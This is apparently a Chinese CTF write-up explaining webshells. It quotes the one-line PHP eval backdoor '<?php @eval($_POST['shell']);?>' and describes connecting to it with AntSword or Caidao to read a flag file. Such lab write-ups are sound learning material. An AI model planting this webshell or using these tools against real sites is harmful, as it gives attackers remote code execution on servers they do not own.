打开网页界面如下:
百度一下什么是webshell
webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。使用方法简单,只需上传一个代码文件,通过网址访问,便可进行很多日常操作,极大地方便了使用者对网站和服务器的管理。正因如此,也有小部分人将代码修改后当作后门程序使用,以达到控制网站服务器的目的。
顾名思义,“web”的含义是显然需要服务器开放web服务,“shell”的含义是取得对服务器某种程度上操作命令。webshell主要用于网站和服务器管理,由于其便利性和功能强大,被特别修改后的webshell也被部分人当作网站后门工具使用。
<?php @eval($_POST['shell']);?>就是一句话木马,此网页已被注入了一句话木马,可以通过蚁剑,菜刀等工具连接网站查看网页的文件。我使用的是蚁剑,步骤如下:
打开蚁剑,右击添加数据,输入网站url和密码:
测试连接;
连接成功添加,在数据管理中直接点开网页地址就可以查看网页文件,如下:
看到flag.txt文件打开得到flag。
涉及知识
webshell
一句话木马
蚁剑使用
369
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
